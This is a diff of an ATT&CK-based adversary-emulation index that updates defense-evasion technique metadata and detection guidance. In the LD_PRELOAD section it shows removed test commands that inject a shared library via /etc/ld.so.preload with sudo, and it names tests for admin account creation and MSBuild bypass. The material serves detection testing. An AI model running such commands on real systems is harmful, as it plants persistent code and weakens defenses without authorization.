PowerShell logs - - Authentication logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'User Account: User Account Creation' + - 'User Account: User Account Metadata' + - 'File: File Modification' + - 'Script: Script Execution' + - 'Process: OS API Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Firmware: Firmware Modification' + - 'Process: Process Creation' + - 'File: File Creation' + - 'Service: Service Creation' + - 'File: File Content' x_mitre_detection: Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell @@ -32240,15 +24780,16 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' + modified: '2021-04-27T19:55:20.290Z' created: '2020-03-12T20:38:12.465Z' x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' x_mitre_detection: |- Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. @@ -32264,7 +24805,7 @@ defense-evasion: x_mitre_defense_bypassed: - Anti-virus - Application control - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Linux @@ -32331,7 +24872,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-16T18:25:12.727Z' + modified: '2021-04-24T13:59:12.787Z' created: '2020-02-21T20:56:06.498Z' x_mitre_contributors: - Vikas Singh, Sophos @@ -32352,12 +24893,8 @@ defense-evasion: arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. " x_mitre_data_sources: - - PowerShell logs - - Process command-line parameters - - Environment variable - - File monitoring - - Authentication logs - - Process monitoring + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -32418,28 +24955,27 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-19T16:31:35.249Z' + modified: '2021-04-24T13:59:13.144Z' created: '2020-02-21T20:22:13.470Z' x_mitre_platforms: - - Linux - Windows + - Office 365 + - IaaS + - Linux - macOS - - AWS - - GCP - - Azure + - Containers x_mitre_data_sources: - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs - - Anti-virus - - Services - - API monitoring - - Environment variable - - Authentication logs - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows Registry + - 'Process: Process Termination' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Sensor Health: Host Status' + - 'Script: Script Execution' + - 'Firewall: Firewall Disable' + - 'Firewall: Firewall Rule Modification' + - 'Cloud Service: Cloud Service Modification' + - 'Cloud Service: Cloud Service Disable' x_mitre_detection: |- Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious. @@ -32457,7 +24993,7 @@ defense-evasion: - Administrator - User x_mitre_is_subtechnique: false - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1562.006: technique: @@ -32508,7 +25044,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-09T14:43:42.450Z' + modified: '2021-01-13T15:56:04.897Z' created: '2020-03-19T19:09:30.329Z' x_mitre_platforms: - Windows @@ -32517,17 +25053,16 @@ defense-evasion: x_mitre_contributors: - Rob Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Sensor health and status + - 'Windows Registry: Windows Registry Key Modification' + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_detection: |- Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data. Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} x_mitre_defense_bypassed: + - Anti-virus - Host intrusion prevention systems - - Anti-virus - - Anti-virus x_mitre_is_subtechnique: true x_mitre_version: '1.0' identifier: T1562.006 @@ -32635,11 +25170,6 @@ defense-evasion: - Linux - macOS - Windows - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Anti-virus - - Binary file metadata x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection @@ -32663,7 +25193,7 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Indicator Removal on Host description: |- - Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*. + Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. external_references: @@ -32679,13 +25209,14 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-16T18:09:49.074Z' + modified: '2021-04-24T13:35:09.065Z' created: '2017-05-31T21:30:55.892Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - macOS - Windows + - Containers x_mitre_detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms. @@ -32694,14 +25225,20 @@ defense-evasion: - Host intrusion prevention systems - Anti-virus x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - API monitoring - - Windows event logs + - 'Process: Process Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' + - 'File: File Metadata' x_mitre_contributors: + - Brad Geesaman, @bradgeesaman - Ed Williams, Trustwave, SpiderLabs - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1070 atomic_tests: - name: Indicator Removal using FSUtil @@ -32767,10 +25304,8 @@ defense-evasion: - Application control - Application control by file name or path x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Matthew Demaske, Adaptforward x_mitre_version: '1.1' @@ -32903,8 +25438,10 @@ defense-evasion: - Travis Smith, Tripwire - Itzik Kotler, SafeBreach x_mitre_data_sources: - - SSL/TLS inspection - - Digital certificate logs + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: |- A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017) @@ -33130,8 +25667,8 @@ defense-evasion: - Travis Smith, Tripwire - Casey Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous @@ -33733,9 +26270,7 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - File monitoring - - Process monitoring - - Binary file metadata + - 'File: File Metadata' x_mitre_detection: Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and @@ -33788,157 +26323,27 @@ defense-evasion: entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior. - x_mitre_data_sources: - - Binary file metadata - - Malware reverse engineering - - Process monitoring x_mitre_version: '2.0' atomic_tests: [] - T1574.006: + T1222.002: technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + created: '2020-02-04T19:24:27.774Z' + modified: '2020-03-29T23:12:40.041Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) + Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). - Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) + Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD + Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). + name: Linux and Mac File and Directory Permissions Modification created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. - - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. - source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1222.002: - technique: external_references: - source_name: mitre-attack external_id: T1222.002 @@ -33951,39 +26356,22 @@ defense-evasion: description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. source_name: Hybrid Analysis Icacls2 May 2018 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Linux and Mac File and Directory Permissions Modification - description: |- - Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). - - Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). - - Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). - id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-29T23:12:40.041Z' - created: '2020-02-04T19:24:27.774Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - root + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_detection: |- Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1222.002 atomic_tests: - name: chmod - Change file or folder mode (numeric mode) @@ -34196,14 +26584,7 @@ defense-evasion: name: sh T1078.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 description: "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for @@ -34212,7 +26593,14 @@ defense-evasion: and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -34223,23 +26611,25 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' + modified: '2021-04-05T12:51:00.663Z' created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1078.003 atomic_tests: - name: Create local account with admin priviliges @@ -34260,6 +26650,15 @@ defense-evasion: elevation_required: true T1127.001: technique: + id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96 + description: |- + Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) + + Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild) + name: MSBuild + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1127.001 @@ -34267,38 +26666,36 @@ defense-evasion: - url: https://msdn.microsoft.com/library/dd393574.aspx description: Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016. source_name: MSDN MSBuild + - source_name: Microsoft MSBuild Inline Tasks 2017 + url: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element + description: Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved + March 5, 2021. - source_name: LOLBAS Msbuild url: https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ description: LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: MSBuild - description: |- - Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) - - Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild) - id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96 type: attack-pattern kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-08T23:29:28.074Z' + modified: '2021-03-05T22:25:48.777Z' created: '2020-03-27T21:50:26.042Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - " .NET Framework version 4 or higher" + x_mitre_contributors: + - Carrie Roberts, @OrOneEqualsOne + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed. - x_mitre_data_sources: - - Process monitoring - x_mitre_platforms: - - Windows + x_mitre_system_requirements: + - " .NET Framework version 4 or higher" + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1127.001 atomic_tests: - name: MSBuild Bypass Using Inline Tasks (C#) @@ -34420,13 +26817,67 @@ defense-evasion: Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows atomic_tests: [] + T1553.005: + technique: + id: attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961 + description: |- + Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) + + Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) + name: Mark-of-the-Web Bypass + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1553.005 + url: https://attack.mitre.org/techniques/T1553/005 + - source_name: Microsoft Zone.Identifier 2020 + url: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 + description: Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved + February 22, 2021. + - source_name: Beek Use of VHD Dec 2020 + url: https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 + description: Beek, C. (2020, December 3). Investigating the Use of VHD Files + By Cybercriminals. Retrieved February 22, 2021. + - source_name: Outflank MotW 2020 + url: https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ + description: Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s + perspective. Retrieved February 22, 2021. + - source_name: Intezer Russian APT Dec 2020 + url: https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ + description: 'Kennedy, J. (2020, December 9). A Zebra in Gopher''s Clothing: + Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, + 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-13T22:47:08.289Z' + created: '2021-02-22T14:20:31.650Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Christiaan Beek, @ChristiaanBeek + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Metadata' + x_mitre_detection: Monitor compressed/archive and image files downloaded from + the Internet as the contents may not be tagged with the MOTW. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Anti-virus, Application control + atomic_tests: [] T1036.004: technique: external_references: @@ -34461,7 +26912,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T20:21:11.895Z' + modified: '2021-04-24T13:24:45.580Z' created: '2020-02-10T20:30:07.426Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -34479,10 +26930,11 @@ defense-evasion: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Service: Service Creation' + - 'Scheduled Job: Scheduled Job Metadata' + - 'Scheduled Job: Scheduled Job Modification' x_mitre_platforms: - Windows - Linux @@ -34520,13 +26972,14 @@ defense-evasion: elevation_required: true T1036: technique: - id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Masquerading - description: |- - Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. - - Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) + created: '2017-05-31T21:30:38.511Z' + modified: '2021-04-24T13:24:45.840Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1036 @@ -34538,7 +26991,7 @@ defense-evasion: url: https://lolbas-project.github.io/ description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. - 